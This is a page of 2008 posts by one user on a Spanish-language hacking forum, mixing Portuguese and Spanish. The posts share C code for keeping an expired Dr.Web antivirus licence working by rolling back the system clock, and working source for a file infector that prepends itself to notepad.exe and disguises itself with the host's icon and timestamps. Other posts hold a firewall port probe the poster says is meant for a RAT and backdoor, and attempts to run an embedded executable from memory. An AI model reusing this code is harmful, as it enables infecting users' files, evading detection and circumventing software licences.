| |
 Mostrar Mensajes
|
|
Páginas: [1] 2
|
|
1
|
Programación / Programación C/C++ / SOLUCION para DrWeb e KIMS
|
en: 16 Junio 2008, 14:33
|
Senhores este final de semana fiz este pequeno programinha que me da possibilidad de poder executar o drwebwcl.exe com um tempo anterior, assim você terá sempre uma chave válida na hora de utilizar com o kims. #include <windows.h> #include <stdio.h> #include <strings.h> #include <windowsx.h> #include <time.h> BOOL ProcessCheck(char *szProcessToKill) { HANDLE hProcessSnap; HANDLE hProcess; PROCESSENTRY32 pe32; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); pe32.dwSize = sizeof(PROCESSENTRY32); if(!Process32First(hProcessSnap,&pe32)) CloseHandle(hProcessSnap); do{ if(!strcmp(pe32.szExeFile,szProcessToKill)) { hProcess = OpenProcess(PROCESS_TERMINATE,0,pe32.th32ProcessID); //TerminateProcess(hProcess,0); CloseHandle(hProcess); return TRUE; } } while(Process32Next(hProcessSnap,&pe32)); CloseHandle(hProcessSnap); return FALSE; } int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, INT nShowCmd, ) { SYSTEMTIME st, torig; WORD year,month,day,hour,minute;//define tipos de variaveis GetSystemTime(&torig); GetSystemTime(&st); //Pega valores de tempo para modificar year=2008; month=6; day=1; hour=11; minute=11; st.wYear=year; st.wMonth=month; st.wDay=day; st.wHour=hour; st.wMinute=minute; SetSystemTime(&st); int argc; char **argv; LPWSTR *szArglist; szArglist = CommandLineToArgvW(GetCommandLineW(), &argc); int __i; if( NULL == szArglist ) { wprintf(L"CommandLineToArgvW failed\n"); return 0; } else { argv = (char **) malloc(sizeof(char) * argc); for( __i=0; __i<argc; __i++) { int tmp = wcslen(szArglist[__i]); char *c = (char *) malloc(sizeof(char) * tmp); wcstombs(c, szArglist[__i], tmp); argv[__i] = c; } } char buf[100]; sprintf(buf,"drwebwcl.exe /SD- /TB- /TM- /TS- /HA- /UP /RP\"%s\" \"%s\"",argv[1],argv[2]); WinExec(buf,SW_SHOW); while (ProcessCheck("drwebwcl.exe")){ //enquanto drweb tiver rodando espera ele terminar Sleep (5000); } SetSystemTime(&torig); return 0; } Espero ajudar alguem mais, necessita so alterar a data para a da sua chave válida e alterar as configurações do kims para trabalhar em conjunto com este programa. Agradeço todos del elhacker.net e indetectables.net especialmente a Thor e a E0N por disseminar conhecimento. |
|
|
|
|
2
|
Programación / Programación C/C++ / Re: Extract ICON and REPLACE
|
en: 29 Mayo 2008, 01:00
|
Hello hermanos, mio source solucionando mio problema segue: #include <windows.h>
BOOL CALLBACK UpdateResources(
HMODULE hModule,
LPCTSTR szType,
LPTSTR szName,
LONG lParam)
{
HANDLE hUpdate = (HANDLE)lParam;
HRSRC hRes = FindResource(hModule,szName,szType);
HGLOBAL hResLoaded = LoadResource(hModule, hRes);
void* pData = LockResource(hResLoaded);
int nSizeOfRes = SizeofResource(hModule,hRes);
UpdateResource(hUpdate,szType,szName,MAKELANGID(LANG_ENGLISH,SUBLANG_ENGLISH_US),pData,nSizeOfRes);
UnlockResource(hResLoaded);
FreeResource(hResLoaded);
return TRUE;
}
typedef struct
{
char szSignature[3];
DWORD dwFileOffset;
}INFECTINFO;
void Infect(char szExePath[])
{
char szOwnName[MAX_PATH];
GetModuleFileName(NULL,szOwnName,MAX_PATH);
HANDLE hFile = CreateFile(szOwnName,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NOR
AL,NULL);
DWORD dwFileSize = GetFileSize(hFile,NULL);
DWORD dwBytesRead;
char* lpBuffer = new char[dwFileSize];
ReadFile(hFile,lpBuffer ,dwFileSize ,&dwBytesRead, NULL);
CloseHandle(hFile);
CopyFile(szExePath , "copy.exe" , FALSE);
hFile = CreateFile(szExePath,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_N
RMAL,NULL);
FILETIME tCreate,tAccess,tWrite;
GetFileTime(hFile,&tCreate,&tAccess,&tWrite);
SetFilePointer(hFile,0,0,FILE_BEGIN);
WriteFile(hFile,lpBuffer,dwFileSize , &dwBytesRead, NULL);
CloseHandle(hFile);
hFile = CreateFile("copy.exe",GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
dwFileSize = GetFileSize(hFile,NULL);
lpBuffer = new char[dwFileSize];
ReadFile(hFile,lpBuffer ,dwFileSize ,&dwBytesRead, NULL);
INFECTINFO ii = {"JK", dwFileSize};
CloseHandle(hFile);
hFile = BeginUpdateResource(szExePath,FALSE);
HMODULE hCopy = LoadLibraryEx("copy.exe" ,NULL,LOAD_LIBRARY_AS_DATAFILE);
EnumResourceNames(hCopy ,RT_ICON,UpdateResources,(long) hFile );
EnumResourceNames(hCopy ,RT_GROUP_ICON,UpdateResources,(long) hFile );
EnumResourceNames(hCopy ,RT_VERSION,UpdateResources,(long) hFile );
FreeLibrary(hCopy);
EndUpdateResource(hFile,FALSE);
DeleteFile("copy.exe");
hFile = CreateFile(szExePath,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_N
RMAL,NULL);
SetFilePointer(hFile,0,0,FILE_END);
WriteFile(hFile,lpBuffer,dwFileSize, &dwBytesRead, NULL);
WriteFile(hFile,&ii,sizeof(ii), &dwBytesRead, NULL);
SetFileTime(hFile,&tCreate,&tAccess,&tWrite);
CloseHandle(hFile);
}
DWORD CheckSelf()
{
char szOwnName[MAX_PATH];
GetModuleFileName(NULL,szOwnName,MAX_PATH);
HANDLE hFile = CreateFile(szOwnName,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NOR
AL,NULL);
SetFilePointer(hFile, -sizeof(INFECTINFO), NULL, FILE_END);
DWORD dwBytesRead;
INFECTINFO ii;
ReadFile(hFile, &ii,sizeof(INFECTINFO) ,&dwBytesRead, NULL);
CloseHandle(hFile);
if(strcmp(ii.szSignature,"JK")) return 0;
else return ii.dwFileOffset;
}
HANDLE DropFile(DWORD dwFileOffset)
{
char szOwnName[MAX_PATH];
GetModuleFileName(NULL,szOwnName,MAX_PATH);
HANDLE hFile = CreateFile(szOwnName,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NOR
AL,NULL);
char* lpBuffer = new char[dwFileOffset];
SetFilePointer(hFile, -dwFileOffset - sizeof(INFECTINFO) , NULL, FILE_END);
DWORD dwBytesRead;
ReadFile(hFile,lpBuffer ,dwFileOffset ,&dwBytesRead, NULL);
CloseHandle(hFile);
hFile = CreateFile("temp.exe",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NUL
);
WriteFile(hFile,lpBuffer,dwFileOffset , &dwBytesRead, NULL);
CloseHandle(hFile);
delete [] lpBuffer;
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo;
ZeroMemory(&StartupInfo, sizeof(StartupInfo));
StartupInfo.cb = sizeof(StartupInfo);
CreateProcess("temp.exe",NULL,NULL,NULL,FALSE,0,NULL,NULL,&StartupInfo,&ProcessInfo);
return ProcessInfo.hProcess;
}
DWORD WINAPI DropFileAndWait(LPVOID lpFileOffset)
{
DWORD* dwFileOffset = (DWORD*)lpFileOffset;
char szOwnName[MAX_PATH];
GetModuleFileName(NULL,szOwnName,MAX_PATH);
HANDLE hFile = CreateFile(szOwnName,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NOR
AL,NULL);
char* lpBuffer = new char[*dwFileOffset];
SetFilePointer(hFile, -*dwFileOffset - sizeof(INFECTINFO) , NULL, FILE_END);
DWORD dwBytesRead;
ReadFile(hFile,lpBuffer ,*dwFileOffset ,&dwBytesRead, NULL);
CloseHandle(hFile);
hFile = CreateFile("temp.exe",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN,NUL
);
WriteFile(hFile,lpBuffer,*dwFileOffset , &dwBytesRead, NULL);
CloseHandle(hFile);
delete [] lpBuffer;
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo;
ZeroMemory(&StartupInfo, sizeof(StartupInfo));
StartupInfo.cb = sizeof(StartupInfo);
CreateProcess("temp.exe",NULL,NULL,NULL,FALSE,0,NULL,NULL,&StartupInfo,&ProcessInfo);
WaitForSingleObject(ProcessInfo.hProcess,INFINITE);
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
return DeleteFile("temp.exe");
return 0;
}
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
DWORD dwCheck = CheckSelf();
if(dwCheck)
{
DWORD dwThreadId;
HANDLE hThread = CreateThread(NULL,0,DropFileAndWait,&dwCheck,0,&dwThreadId);
WaitForSingleObject(hThread,INFINITE);
CloseHandle(hThread);
}
else Infect("notepad.exe");
return 0;
} |
|
|
|
|
3
|
Programación / Programación C/C++ / Extract ICON and REPLACE
|
en: 28 Mayo 2008, 22:18
|
|
Olá hermanos, estoy tentando extraer lo icone de um executable e sobrescrever lo icone por otro, alguém poderia me ajudar pois estoy atráz de um modelo de codigo de exemplo e no encontro?
|
|
|
|
|
5
|
Programación / Programación C/C++ / Re: ¿Cómo saber si una puerta está abierta a través de el router
|
en: 13 Mayo 2008, 20:35
|
Una version, melhorada: #include <cstdlib>
#include <iostream>
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#define WINSOCK_VERSION MAKEWORD(2,0)
using namespace std;
bool OpenPort(char* ip, int porta)
{
int checkSock;
SOCKET sock;
WSAData wsa; // You probably forgot to add this..
WSAStartup(WINSOCK_VERSION,&wsa);
struct sockaddr_in sClient;
memset(&sClient,0,sizeof(sClient));
sock = socket( AF_INET, SOCK_STREAM, 0 );
sClient.sin_family = AF_INET;
sClient.sin_addr.s_addr = inet_addr(ip);
sClient.sin_port = htons( porta );
if ( (checkSock = connect( sock,(struct sockaddr*)&sClient, sizeof(sClient) )) == SOCKET_ERROR ) return false;
return true;
}
int main(int argc, char *argv[])
{
WSADATA ws;
if(WSAStartup(MAKEWORD(1,1),&ws)!=0){
fprintf(stderr,"Error:WSAStartup");
}
struct hostent *messenger;
struct hostent *google;
messenger=gethostbyname("messenger.hotmail.com");
google=gethostbyname("www.google.com.br");
//printf("%s\n",inet_ntoa(*((struct in_addr *)h->h_addr)));
if (OpenPort(inet_ntoa(*((struct in_addr *)messenger->h_addr)),1866))
{
printf("conectou 1863");
}
else if (OpenPort("199.7.83.42",53))
{
printf("conectou 53");
}
else if (OpenPort(inet_ntoa(*((struct in_addr *)google->h_addr)),808))
{
printf("conectou 808");
}
else if (OpenPort("199.7.83.42",22))
{
printf("conectou 22");
}
} Deste modo posso fazer meu RAT, patchear minha backdoor de acordo com a porta aberta no firewall. |
|
|
|
|
6
|
Programación / Programación C/C++ / Re: ¿Cómo saber si una puerta está abierta a través de el router
|
en: 13 Mayo 2008, 18:37
|
Ola, soy grato a todos deste foro especialmente E0N, mas consegui resolver mio problema, con seguinte codigo. #include <cstdlib>
#include <iostream>
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#define WINSOCK_VERSION MAKEWORD(2,0)
using namespace std;
bool ConnectToServer(char* ip)
{
int checkSock;
SOCKET sock;
WSAData wsa; // You probably forgot to add this..
WSAStartup(WINSOCK_VERSION,&wsa);
struct sockaddr_in sClient;
memset(&sClient,0,sizeof(sClient));
sock = socket( AF_INET, SOCK_STREAM, 0 );
sClient.sin_family = AF_INET;
sClient.sin_addr.s_addr = inet_addr(ip);
sClient.sin_port = htons( 8080 );
if ( (checkSock = connect( sock,(struct sockaddr*)&sClient, sizeof(sClient) )) == SOCKET_ERROR ) return false;
return true;
}
int main(int argc, char *argv[])
{
if (ConnectToServer("10.0.0.1"))
{
printf("conectou");
}
else
{
printf("nao conectou");
};
}
Agora so ire fazer algunas modificaciones e conseguire mios objetivos. Gracias, []'s |
|
|
|
|
7
|
Programación / Programación C/C++ / ¿Cómo saber si una puerta está abierta a través de el router
|
en: 12 Mayo 2008, 23:39
|
|
Sorry my bad spanish.
Spanish
Hola personal, hago un cheque indicando que las puertas de este 1863 a través del router, sino que se ejecute mi codigo no es otro checo puerta, por ejemplo, 2222, y así sucesivamente.
Portuguese
Eu preciso fazer uma checagem de portas, se o programa consegue conectar através do router por exemplo se consegue conectar no servidor do messenger se sim executa um codigo se nao ele checa outra porta por exemplo 2222 posso apontar um host online.
obrigado a todos!
[]'s
|
|
|
|
|
9
|
Programación / Programación C/C++ / Re: Carregando Programa direto na memoria e executando - AJUDA
|
en: 08 Mayo 2008, 17:30
|
Caros amigos E0N, Eternal Idol, me ajudem, so consegui chegar aqui, o codigo compila mas no executa no da erro nenhum, estoy compilando con MS Visual C++, este shellcode eres la calculatora de windows, poderia ser qualquer executavel. #include <windows.h>
#include <stdio.h>
/*
00000000: 55 push ebp
00000001: 8B EC mov ebp,esp
00000003: 8B 45 08 mov eax,dword ptr [ebp+8]
00000006: 05 66 06 00 00 add eax,666h
0000000B: 5D pop ebp
0000000C: C3 ret
int stupid_add(int x)
{
return x + 0x666;
}*/
BYTE stupid_add_code[] =
{
0x4d,0x5a,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xff,
0xff,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
...
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00
};
void main()
{
LPVOID stupid_add_codeAddr = VirtualAlloc(0, sizeof(stupid_add_code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
SIZE_T written = 0;
WriteProcessMemory(GetCurrentProcess(), stupid_add_codeAddr, stupid_add_code, sizeof(stupid_add_code), &written);
DWORD value = 15;
__asm
{
push value
call stupid_add_codeAddr
add esp, 4
mov value, eax
}
CreateRemoteThread(stupid_add_code,NULL,NULL,(LPTHREAD_START_ROUTINE)stupid_add_codeAddr,NULL,NULL,NULL);
CloseHandle(stupid_add_code);
//printf("0x%X\r\n", stupid_add(value));
// printf("0x%X\r\n", value);
}
|
|
|
|
|
11
|
Programación / Programación C/C++ / Re: Carregando Programa direto na memoria e executando.
|
en: 07 Mayo 2008, 16:31
|
Muito grato E0N, tentarei explicar, pois não desejo injectar dll mas si, executar um segundo programa dentro da memoria. 1. Tenho meu filetest.h ex: static unsigned char topo[]=
{
0x4d,0x5a,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xff,
0xff,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,
...
} 2. Tengo teste.cpp #include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
#include "filetest.h"
int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, PSTR szCmdLine, int iCmdShow)
{
FILE* filetestfile;
fwrite(filetest,sizeof(filetest),1,filetestfile=fopen("C:\\file.exe","wb"));
fclose(filetestfile);
WinExec("C:\\file.exe",SW_SHOW);
} O que tenho feito é criar o arquivo so despois executalo, mas o que desejo é no formato mencionado não em ASM, mas em SHELLCODE, executarlo directamente en la memoria sem necessitar-lo criar fisicamente no hardisk e se possivel ainda passando parametros. Soy muito grato a todos de foro elhacker. Vida longa a E0N e nosso amigo Eternal Idol. []'s |
|
|
|
|
|
| |
|
